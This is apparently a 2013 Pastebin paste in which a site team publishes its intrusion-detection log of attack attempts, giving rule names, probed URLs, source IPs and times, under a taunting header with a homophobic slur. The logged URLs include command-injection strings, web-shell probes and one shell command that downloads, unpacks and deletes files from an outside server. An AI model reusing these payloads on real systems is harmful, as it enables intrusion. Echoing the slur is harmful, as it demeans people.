scriptz-team

HACKER iDiOTS #137 - YOU WANT IT? YOU GOT IT!

Dec 11th, 2013
15,818
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. THiS iS THE iPs and paths that HACKERz N00Bz TRiED to hack us (expose paths, passwd, error logs etc).
  3. DO NEVER TRY HACK US AGAiN!
  4. EVEN YOU DO MORE AND MORE, WE (NOT ONLY WE AS YOUR iP iS LOGGED BY NOW!) WiLL REPORT YOUR iP!
  5. */
  6.  
  7. And the faggot winner is -> 200.239.65.110, lold at your try ^^
  8.  
  9. -------------------------
  10. LOG: Detects JavaScript array properties and methods
  11. URL: http://www.rlzlog.info/?t=Join.The.Beat.S01E03.DUTCH.PDTV.x264-DiFFERENT&date=2013-11-18%2023:14:20&cat=TV-x264&size=470.0MB%7C33F&key=8c21b6ec0fcfa9f337bf5b64d3282b38
  12. IP: 82.74.222.167
  13. DATE: 10-Dec-2013 22:05:20
  14. -------------------------
  15. LOG: Nasty Joomla Probe
  16. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  17. IP: 91.121.74.175
  18. DATE: 10-Dec-2013 22:42:25
  19. -------------------------
  20. LOG: Nasty Joomla Probe
  21. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  22. IP: 91.121.74.175
  23. DATE: 10-Dec-2013 22:42:25
  24. -------------------------
  25. LOG: Nasty Joomla Probe
  26. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  27. IP: 91.121.74.175
  28. DATE: 10-Dec-2013 22:42:26
  29. -------------------------
  30. LOG: Detects basic obfuscated JavaScript script injections
  31. URL: http://newz.scriptz-team.info/searchResult/.html
  32. IP: 186.37.108.36
  33. DATE: 10-Dec-2013 23:18:40
  34. -------------------------
  35. LOG: Detects self contained xss via with(), common loops and regex to string conversion
  36. URL: http://php-app.info/p/[YouTube]VideoGrabber
  37. IP: 198.211.117.220
  38. DATE: 10-Dec-2013 23:39:09
  39. -------------------------
  40. LOG: Detects code injection attempts 2/3
  41. URL: http://www.rlzlog.info/horde/services/help/?show=about&module=;%22.passthru(%22id%22);
  42. IP: 200.239.65.110
  43. DATE: 11-Dec-2013 00:02:00
  44. -------------------------
  45. LOG: Detects code injection attempts 3/3
  46. URL: http://www.rlzlog.info/awstats.pl?configdir=%7Cecho%20;echo%20;id;echo%20;echo%20%7C
  47. IP: 200.239.65.110
  48. DATE: 11-Dec-2013 00:02:05
  49. -------------------------
  50. LOG: Install, Upgrade Probe
  51. URL: http://scriptz-team.info/app/ver/sites/koobi_update.php
  52. IP: 217.125.213.4
  53. DATE: 11-Dec-2013 00:05:19
  54. -------------------------
  55. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  56. URL: http://newz.scriptz-team.info/doc/My-host-upgrade-the-PHP-ver-to-5-2-17-I-can%C2%B4t-see-my-forum.doc
  57. IP: 180.76.6.135
  58. DATE: 11-Dec-2013 01:54:49
  59. -------------------------
  60. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  61. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Board-3-0/074856-r-is-converted-to-%C2%AE.html
  62. IP: 83.149.126.98
  63. DATE: 11-Dec-2013 01:57:51
  64. -------------------------
  65. LOG: Nasty Joomla Probe
  66. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  67. IP: 85.114.140.76
  68. DATE: 11-Dec-2013 02:22:09
  69. -------------------------
  70. LOG: Nasty Joomla Probe
  71. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  72. IP: 85.114.140.76
  73. DATE: 11-Dec-2013 02:22:09
  74. -------------------------
  75. LOG: Nasty Joomla Probe
  76. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  77. IP: 85.114.140.76
  78. DATE: 11-Dec-2013 02:22:10
  79. -------------------------
  80. LOG: Nasty Joomla Probe
  81. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  82. IP: 85.114.140.76
  83. DATE: 11-Dec-2013 02:22:10
  84. -------------------------
  85. LOG: Images Stories Hack Probe
  86. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/images/stories/cliti.php?rf
  87. IP: 85.114.140.76
  88. DATE: 11-Dec-2013 02:22:14
  89. -------------------------
  90. LOG: Images Stories Hack Probe
  91. URL: http://newz.scriptz-team.info/images/stories/cliti.php?rf
  92. IP: 85.114.140.76
  93. DATE: 11-Dec-2013 02:22:14
  94. -------------------------
  95. LOG: Detects common XSS concatenation patterns 1/2
  96. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  97. IP: 50.115.163.163
  98. DATE: 11-Dec-2013 02:22:39
  99. -------------------------
  100. LOG: Detects common XSS concatenation patterns 1/2
  101. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  102. IP: 50.115.163.163
  103. DATE: 11-Dec-2013 02:22:41
  104. -------------------------
  105. LOG: Detects common XSS concatenation patterns 1/2
  106. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  107. IP: 23.94.8.137
  108. DATE: 11-Dec-2013 02:32:24
  109. -------------------------
  110. LOG: Detects common XSS concatenation patterns 1/2
  111. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  112. IP: 23.94.8.137
  113. DATE: 11-Dec-2013 02:32:24
  114. -------------------------
  115. LOG: Nasty Joomla Probe
  116. URL: http://scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager
  117. IP: 178.216.50.42
  118. DATE: 11-Dec-2013 02:32:25
  119. -------------------------
  120. LOG: Admin Probe
  121. URL: http://nzbx.ws/blog/wp-admin/
  122. IP: 192.3.177.253
  123. DATE: 11-Dec-2013 02:32:26
  124. -------------------------
  125. LOG: Images Stories Hack Probe
  126. URL: http://www.scriptz-team.info/images/stories/food.php?rf
  127. IP: 184.154.105.118
  128. DATE: 11-Dec-2013 02:32:26
  129. -------------------------
  130. LOG: Nasty Joomla Probe
  131. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  132. IP: 184.154.105.118
  133. DATE: 11-Dec-2013 02:32:26
  134. -------------------------
  135. LOG: Install, Upgrade Probe
  136. URL: http://www.rlzlog.info/admin.php
  137. IP: 69.175.120.21
  138. DATE: 11-Dec-2013 02:32:26
  139. -------------------------
  140. LOG: Install, Upgrade Probe
  141. URL: http://rlzlog.info/admin.php
  142. IP: 199.119.226.129
  143. DATE: 11-Dec-2013 02:32:28
  144. -------------------------
  145. LOG: Admin Probe
  146. URL: http://nzbx.ws/wp/wp-admin/
  147. IP: 23.88.104.150
  148. -------------------------
  149. LOG: Admin Probe
  150. URL: http://nzbx.ws/wp-admin/
  151. IP: 23.88.104.150
  152. DATE: 11-Dec-2013 02:32:29
  153. DATE: 11-Dec-2013 02:32:29
  154. -------------------------
  155. LOG: Admin Probe
  156. URL: http://nzbx.ws/wordpress/wp-admin/
  157. IP: 151.237.189.223
  158. DATE: 11-Dec-2013 02:32:29
  159. -------------------------
  160. LOG: Install, Upgrade Probe
  161. URL: http://scriptz-team.info/admin.php
  162. IP: 80.245.121.157
  163. DATE: 11-Dec-2013 03:09:50
  164. -------------------------
  165. LOG: Install, Upgrade Probe
  166. URL: http://scriptz-team.info/admin.php
  167. IP: 80.245.121.157
  168. DATE: 11-Dec-2013 03:09:50
  169. -------------------------
  170. LOG: Detects conditional SQL injection attempts
  171. URL: http://newz.scriptz-team.info/XenForo-Development-Questions/094310-Having-trouble-with-option-tabs.html
  172. IP: 108.166.55.48
  173. DATE: 11-Dec-2013 03:36:09
  174. -------------------------
  175. LOG: Nasty Joomla Probe
  176. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  177. IP: 94.23.252.112
  178. DATE: 11-Dec-2013 03:44:07
  179. -------------------------
  180. LOG: Nasty Joomla Probe
  181. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  182. IP: 94.23.252.112
  183. DATE: 11-Dec-2013 03:44:07
  184. -------------------------
  185. LOG: Nasty Joomla Probe
  186. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  187. IP: 94.23.252.112
  188. DATE: 11-Dec-2013 03:44:07
  189. -------------------------
  190. LOG: Nasty Joomla Probe
  191. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  192. IP: 94.23.252.112
  193. DATE: 11-Dec-2013 03:44:08
  194. -------------------------
  195. LOG: Nasty Joomla Probe
  196. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  197. IP: 94.23.252.112
  198. DATE: 11-Dec-2013 03:44:08
  199. -------------------------
  200. LOG: Nasty Joomla Probe
  201. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  202. IP: 94.23.252.112
  203. DATE: 11-Dec-2013 03:44:08
  204. -------------------------
  205. LOG: Install, Upgrade Probe
  206. URL: http://newz.scriptz-team.info/admin.php
  207. IP: 94.159.157.227
  208. DATE: 11-Dec-2013 03:45:00
  209. -------------------------
  210. LOG: Nasty Joomla Probe
  211. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  212. IP: 202.46.50.28
  213. DATE: 11-Dec-2013 03:50:01
  214. -------------------------
  215. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  216. URL: http://newz.scriptz-team.info/SocialEngine-Announcements/092196-SocialEngine-PHP-4-6-%E2%80%93-What-We%E2%80%99re-Working-On.html
  217. IP: 184.154.38.146
  218. DATE: 11-Dec-2013 04:04:25
  219. -------------------------
  220. LOG: Detects basic directory traversal
  221. URL: http://newz.scriptz-team.info/.../clientscript/vbulletin_global.js
  222. IP: 184.154.38.149
  223. DATE: 11-Dec-2013 04:04:25
  224. -------------------------
  225. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  226. URL: http://newz.scriptz-team.info/CS-Cart-blog/037609-%E2%80%9CPowered-by-CS-Cart%E2%80%9D-Link-Removal-License.html
  227. IP: 69.175.108.206
  228. DATE: 11-Dec-2013 04:04:25
  229. -------------------------
  230. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  231. URL: http://newz.scriptz-team.info/html/Case-Study-Hitachi-Europe-Sees-User-Adoption-Success-and-Frees-Up-Their-Team%E2%80%99s-Time-with-.html
  232. IP: 50.115.169.112
  233. DATE: 11-Dec-2013 04:04:26
  234. -------------------------
  235. LOG: OFC Probe
  236. URL: http://newz.scriptz-team.info//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php
  237. IP: 50.115.174.43
  238. DATE: 11-Dec-2013 04:04:26
  239. -------------------------
  240. LOG: Nasty Joomla Probe
  241. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  242. IP: 208.89.213.3
  243. DATE: 11-Dec-2013 04:04:26
  244. -------------------------
  245. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  246. URL: http://newz.scriptz-team.info/Kayako-Forums-News-and-Announcements/095704-Are-You-Up-to-Date-We%E2%80%99ve-Made-It-Easier-to-See-What%E2%80%99s-New.html
  247. IP: 208.89.208.158
  248. DATE: 11-Dec-2013 04:04:26
  249. -------------------------
  250. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  251. URL: http://newz.scriptz-team.info/html/Cyborg-vBulletin-4-1-8-Styles-verf%C3%83%C2%BCgbar.html
  252. IP: 199.119.226.122
  253. DATE: 11-Dec-2013 04:04:26
  254. -------------------------
  255. LOG: Images Stories Hack Probe
  256. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/images/stories/robot.php
  257. IP: 208.94.246.180
  258. DATE: 11-Dec-2013 04:04:27
  259. -------------------------
  260. LOG: Images Stories Hack Probe
  261. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/images/stories/myblack.php?cmd=lwp-download%20http://globalmediation.ca/gmwp/wp-includes/js/plupload/file.tar.gz;wget%20http://globalmediation.ca/gmwp/wp-includes/js/plupload/file.tar.gz;curl%20-O%20http://globalmediation.ca/gmwp/wp-includes/js/plupload/file.tar.gz;tar%20zxvf%20file.tar.gz;rm%20-fr%20
  262. IP: 184.22.121.149
  263. DATE: 11-Dec-2013 04:04:27
  264. -------------------------
  265. LOG: Images Stories Hack Probe
  266. URL: http://newz.scriptz-team.info//images/stories/tmp.php?rf
  267. IP: 50.115.169.6
  268. DATE: 11-Dec-2013 04:04:27
  269. -------------------------
  270. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  271. URL: http://newz.scriptz-team.info/html/CubeCart-Autumn-SALE-get-20percent-off%C3%A2%E2%82%AC%C2%A6-Dont-Miss-Out-.html
  272. IP: 50.115.172.106
  273. DATE: 11-Dec-2013 04:04:27
  274. -------------------------
  275. LOG: Detects basic obfuscated JavaScript script injections
  276. URL: http://newz.scriptz-team.info/html/.html
  277. IP: 50.115.174.42
  278. DATE: 11-Dec-2013 04:04:27
  279. -------------------------
  280. LOG: Images Stories Hack Probe
  281. URL: http://newz.scriptz-team.info//images/stories/configuration.php?rf
  282. IP: 173.213.97.194
  283. DATE: 11-Dec-2013 04:04:27
  284. -------------------------
  285. LOG: Nasty Joomla Probe
  286. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
  287. IP: 198.143.144.77
  288. DATE: 11-Dec-2013 04:04:28
  289. -------------------------
  290. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  291. URL: http://newz.scriptz-team.info/CubeCart-News-and-Announcements/096168-Get-a-credit-worth-up-to-%C2%A3250-when-you-switch-to-PayPal-Pro.html
  292. IP: 173.213.97.249
  293. DATE: 11-Dec-2013 04:04:28
  294. -------------------------
  295. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  296. URL: http://newz.scriptz-team.info/IPS-Tracker-CleanCut-Skin/022930-3-1-0-Post-moderation-checkboxes-fail%C3%83%E2%80%9A%C3%A2%E2%82%AC%E2%80%9DError-5030.html
  297. IP: 198.52.247.40
  298. DATE: 11-Dec-2013 04:04:28
  299. -------------------------
  300. LOG: Nasty Joomla Probe
  301. URL: http://newz.scriptz-team.info//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
  302. IP: 23.88.104.170
  303. DATE: 11-Dec-2013 04:04:28
  304. -------------------------
  305. LOG: Images Stories Hack Probe
  306. URL: http://newz.scriptz-team.info//images/stories/localhost.php?rf
  307. IP: 50.115.160.103
  308. DATE: 11-Dec-2013 04:04:28
  309. -------------------------
  310. LOG: Images Stories Hack Probe
  311. URL: http://newz.scriptz-team.info/images/stories/cliti.php?rf
  312. IP: 192.210.194.137
  313. DATE: 11-Dec-2013 04:04:28
  314. -------------------------
  315. LOG: Admin Probe
  316. URL: http://newz.scriptz-team.info/blog/wp-admin/
  317. IP: 208.89.208.201
  318. DATE: 11-Dec-2013 04:04:28
  319. -------------------------
  320. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  321. URL: http://newz.scriptz-team.info/SocialEngine-Announcements/090761-SocialEngine-PHP-4-5-Released-%E2%80%93-Performance-Improvements-and-New-Modern-Theme.html
  322. IP: 192.3.149.89
  323. DATE: 11-Dec-2013 04:04:28
  324. -------------------------
  325. LOG: Detects conditional SQL injection attempts
  326. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Converge-Modules/08397-Wordpress-MU-having-problems-with-usernames-converged-from-IPB3.html
  327. IP: 198.143.144.75
  328. DATE: 11-Dec-2013 04:04:29
  329. -------------------------
  330. LOG: Nasty Joomla Probe
  331. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/027666-Warning-explode-expects-parameter.html&sa=U&ei=9fKLUr69Fba24APJl4HACg&ved=0CDcQFjAI&usg=AFQjCNFhINiWOs7aWLzx9FcAIKT-gJBEaA//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
  332. IP: 192.210.149.152
  333. DATE: 11-Dec-2013 04:04:29
  334. -------------------------
  335. LOG: Images Stories Hack Probe
  336. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/images/stories/onet.php
  337. IP: 69.175.120.22
  338. DATE: 11-Dec-2013 04:04:29
  339. -------------------------
  340. LOG: Detects basic SQL authentication bypass attempts 2/3
  341. URL: http://newz.scriptz-team.info/IPS-Resources-Blog/06363-Selection-of-light-and-professional-skins-from-Skinbox.html
  342. IP: 184.154.196.98
  343. DATE: 11-Dec-2013 04:04:29
  344. -------------------------
  345. LOG: Images Stories Hack Probe
  346. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/images/stories/myblack.php?smtp
  347. IP: 23.94.8.175
  348. DATE: 11-Dec-2013 04:04:30
  349. -------------------------
  350. LOG: OFC Probe
  351. URL: http://newz.scriptz-team.info//core/lib/php-ofc-library/ofc_upload_image.php
  352. IP: 69.175.108.205
  353. DATE: 11-Dec-2013 04:04:30
  354. -------------------------
  355. LOG: Admin Probe
  356. URL: http://nzbx.ws/blog/wp-admin/
  357. IP: 5.157.41.97
  358. DATE: 11-Dec-2013 04:04:40
  359. -------------------------
  360. LOG: Admin Probe
  361. URL: http://nzbx.ws/wordpress/wp-admin/
  362. IP: 50.115.169.205
  363. DATE: 11-Dec-2013 04:04:41
  364. -------------------------
  365. LOG: Install, Upgrade Probe
  366. URL: http://scriptz-team.info/admin.php
  367. IP: 69.175.108.206
  368. DATE: 11-Dec-2013 04:04:41
  369. -------------------------
  370. LOG: Detects JavaScript array properties and methods
  371. URL: http://nzbx.ws/article.php?group=alt.binaries.mpeg.videos.pop&article=320863
  372. IP: 192.3.172.195
  373. DATE: 11-Dec-2013 04:04:41
  374. -------------------------
  375. LOG: Detects JavaScript array properties and methods
  376. URL: http://nzbx.ws/article.php?group=alt.binaries.mpeg.videos.pop&article=320870
  377. IP: 5.157.41.66
  378. DATE: 11-Dec-2013 04:04:42
  379. -------------------------
  380. LOG: Admin Probe
  381. URL: http://rlzlog.info/wordpress/wp-admin/
  382. IP: 69.175.108.202
  383. DATE: 11-Dec-2013 04:04:43
  384. -------------------------
  385. LOG: Admin Probe
  386. URL: http://nzbx.ws/wp/wp-admin/
  387. IP: 69.175.112.21
  388. DATE: 11-Dec-2013 04:04:43
  389. -------------------------
  390. LOG: Install, Upgrade Probe
  391. URL: http://scriptz-team.info/app/ver/sites/koobi_update.php
  392. IP: 69.175.84.91
  393. DATE: 11-Dec-2013 04:04:43
  394. -------------------------
  395. LOG: Admin Probe
  396. URL: http://skripterz.info/admin/index.php
  397. IP: 69.175.94.254
  398. DATE: 11-Dec-2013 04:04:43
  399. -------------------------
  400. LOG: Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces
  401. URL: http://www.rlzlog.info/?t=ThisIsGlamour.13.10.20.Sophie.Star.XXX.720p.WMV-PAYiSO&date=2013-11-07%2013:57:16&cat=XXX&size=277.2MB
  402. IP: 23.88.104.177
  403. DATE: 11-Dec-2013 04:04:49
  404. -------------------------
  405. LOG: Nasty Joomla Probe
  406. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  407. IP: 192.210.149.152
  408. DATE: 11-Dec-2013 04:04:50
  409. -------------------------
  410. LOG: Detects concatenated basic SQL injection and SQLLFI attempts
  411. URL: http://www.scriptz-team.info/CreateUser.asp
  412. IP: 23.94.8.133
  413. DATE: 11-Dec-2013 04:04:50
  414. -------------------------
  415. LOG: Admin Probe
  416. URL: http://www.protectionx.info/phpmyadmin/README
  417. IP: 192.157.251.193
  418. DATE: 11-Dec-2013 04:07:55
  419. -------------------------
  420. LOG: Admin Probe
  421. URL: http://www.protectionx.info/admin/licence
  422. IP: 69.175.94.254
  423. DATE: 11-Dec-2013 04:07:55
  424. -------------------------
  425. LOG: Admin Probe
  426. URL: http://www.protectionx.info/phpmyadmin/ChangeLog
  427. IP: 173.236.54.2
  428. DATE: 11-Dec-2013 04:07:55
  429. -------------------------
  430. LOG: Admin Probe
  431. URL: http://www.protectionx.info/application/Plugin/Example/View/admin/index.tpl
  432. IP: 75.127.0.4
  433. DATE: 11-Dec-2013 04:07:55
  434. -------------------------
  435. LOG: Detects very basic XSS probings
  436. URL: http://www.protectionx.info/Southidceditor/Dialog/about.htm
  437. IP: 23.88.104.167
  438. DATE: 11-Dec-2013 04:07:55
  439. -------------------------
  440. LOG: Admin Probe
  441. URL: http://www.protectionx.info/cms4jadmin/skin/blue/css/icon.css
  442. IP: 173.213.97.191
  443. DATE: 11-Dec-2013 04:07:56
  444. -------------------------
  445. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  446. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Installations-and-Upgrades/057093-Suite-I-can%C3%83%E2%80%9A%C3%82%C2%B4t-access-admin-panel-after-upgrade-from-3-8-7-to-4-1-5.html
  447. IP: 74.221.217.144
  448. DATE: 11-Dec-2013 05:12:23
  449. -------------------------
  450. LOG: Detects possible includes, VBSCript/JScript encodeed and packed functions
  451. URL: http://newz.scriptz-team.info/vBulletin-3-8-Template-Modifications/javascript:togglecategory('rss');
  452. IP: 124.78.41.56
  453. DATE: 11-Dec-2013 05:18:26
  454. -------------------------
  455. LOG: Nasty Joomla Probe
  456. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  457. IP: 183.78.169.60
  458. DATE: 11-Dec-2013 05:28:07
  459. -------------------------
  460. LOG: Install, Upgrade Probe
  461. URL: http://protectionx.info/admin.php
  462. IP: 5.43.243.14
  463. DATE: 11-Dec-2013 05:37:47
  464. -------------------------
  465. LOG: Nasty Joomla Probe
  466. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  467. IP: 188.165.197.113
  468. DATE: 11-Dec-2013 06:14:26
  469. -------------------------
  470. LOG: Nasty Joomla Probe
  471. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  472. IP: 188.165.197.113
  473. DATE: 11-Dec-2013 06:14:26
  474. -------------------------
  475. LOG: Nasty Joomla Probe
  476. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  477. IP: 188.165.197.113
  478. DATE: 11-Dec-2013 06:14:27
  479. -------------------------
  480. LOG: Images Stories Hack Probe
  481. URL: http://newz.scriptz-team.info/images/stories/config.inc.php?rf
  482. IP: 188.165.197.113
  483. DATE: 11-Dec-2013 06:14:29
  484. -------------------------
  485. LOG: Nasty Joomla Probe
  486. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  487. IP: 188.165.197.113
  488. DATE: 11-Dec-2013 06:14:32
  489. -------------------------
  490. LOG: Images Stories Hack Probe
  491. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/images/stories/config.inc.php?rf
  492. IP: 188.165.197.113
  493. DATE: 11-Dec-2013 06:14:41
  494. -------------------------
  495. LOG: Install, Upgrade Probe
  496. URL: http://scriptz-team.info/app/ver/sites/koobi_update.php
  497. IP: 207.204.119.122
  498. DATE: 11-Dec-2013 06:17:26
  499. -------------------------
  500. LOG: Nasty Joomla Probe
  501. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/076491-VBIV-15287-Fatal-error-No-required-itemid-specified-when-instantiating-Model-object-vBCms_Item_Content-on-line-207-.html&sa=U&ei=wsunUrz6Do2Tigff4YHoCQ&ved=0CD0QFjAFOKwC&usg=AFQjCNGMl04DGjmD6XOqDfEQTCdqKc2j0g/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  502. IP: 173.214.171.146
  503. DATE: 11-Dec-2013 06:20:07
  504. -------------------------
  505. LOG: Nasty Joomla Probe
  506. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  507. IP: 173.214.171.146
  508. DATE: 11-Dec-2013 06:20:07
  509. -------------------------
  510. LOG: Nasty Joomla Probe
  511. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  512. IP: 173.214.171.146
  513. DATE: 11-Dec-2013 06:20:08
  514. -------------------------
  515. LOG: Images Stories Hack Probe
  516. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/076491-VBIV-15287-Fatal-error-No-required-itemid-specified-when-instantiating-Model-object-vBCms_Item_Content-on-line-207-.html&sa=U&ei=wsunUrz6Do2Tigff4YHoCQ&ved=0CD0QFjAFOKwC&usg=AFQjCNGMl04DGjmD6XOqDfEQTCdqKc2j0g//images/stories/localhost.php?rf
  517. IP: 173.214.171.146
  518. DATE: 11-Dec-2013 06:20:10
  519. -------------------------
  520. LOG: Images Stories Hack Probe
  521. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs//images/stories/localhost.php?rf
  522. IP: 173.214.171.146
  523. DATE: 11-Dec-2013 06:20:11
  524. -------------------------
  525. LOG: Images Stories Hack Probe
  526. URL: http://newz.scriptz-team.info//images/stories/localhost.php?rf
  527. IP: 173.214.171.146
  528. DATE: 11-Dec-2013 06:20:11
  529. -------------------------
  530. LOG: Detects common XSS concatenation patterns 1/2
  531. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  532. IP: 27.153.230.64
  533. DATE: 11-Dec-2013 06:30:08
  534. -------------------------
  535. LOG: Detects common XSS concatenation patterns 1/2
  536. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  537. IP: 198.20.79.172
  538. DATE: 11-Dec-2013 07:25:08
  539. -------------------------
  540. LOG: Detects common XSS concatenation patterns 1/2
  541. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  542. IP: 198.20.79.172
  543. DATE: 11-Dec-2013 07:25:10
  544. -------------------------
  545. LOG: Install, Upgrade Probe
  546. URL: http://rlzlog.info/admin.php
  547. IP: 5.43.243.14
  548. DATE: 11-Dec-2013 07:55:20
  549. -------------------------
  550. LOG: OFC Probe
  551. URL: http://newz.scriptz-team.info/archive-page-999.html&sa=U&ei=fdunUvecMsbdswbUqIDABw&ved=0CMMDEBYwVTjIAQ&usg=AFQjCNGD5Fvnc8Eb63CxVkA_BEOW0TRC1A//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php
  552. IP: 83.147.118.83
  553. DATE: 11-Dec-2013 08:01:57
  554. -------------------------
  555. LOG: Detects url-, name-, JSON, and referrer-contained payload attacks
  556. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/047399-Forum-Profile-Additional-Information-Location.html
  557. IP: 50.57.52.177
  558. DATE: 11-Dec-2013 08:02:26
  559. -------------------------
  560. LOG: Nasty Joomla Probe
  561. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  562. IP: 78.110.50.122
  563. DATE: 11-Dec-2013 08:26:37
  564. -------------------------
  565. LOG: Nasty Joomla Probe
  566. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  567. IP: 78.110.50.122
  568. DATE: 11-Dec-2013 08:26:43
  569. -------------------------
  570. LOG: Nasty Joomla Probe
  571. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  572. IP: 78.110.50.122
  573. DATE: 11-Dec-2013 08:26:43
  574. -------------------------
  575. LOG: Images Stories Hack Probe
  576. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/images/stories/adrelite.php?rf
  577. IP: 78.110.50.122
  578. DATE: 11-Dec-2013 08:26:45
  579. -------------------------
  580. LOG: Nasty Joomla Probe
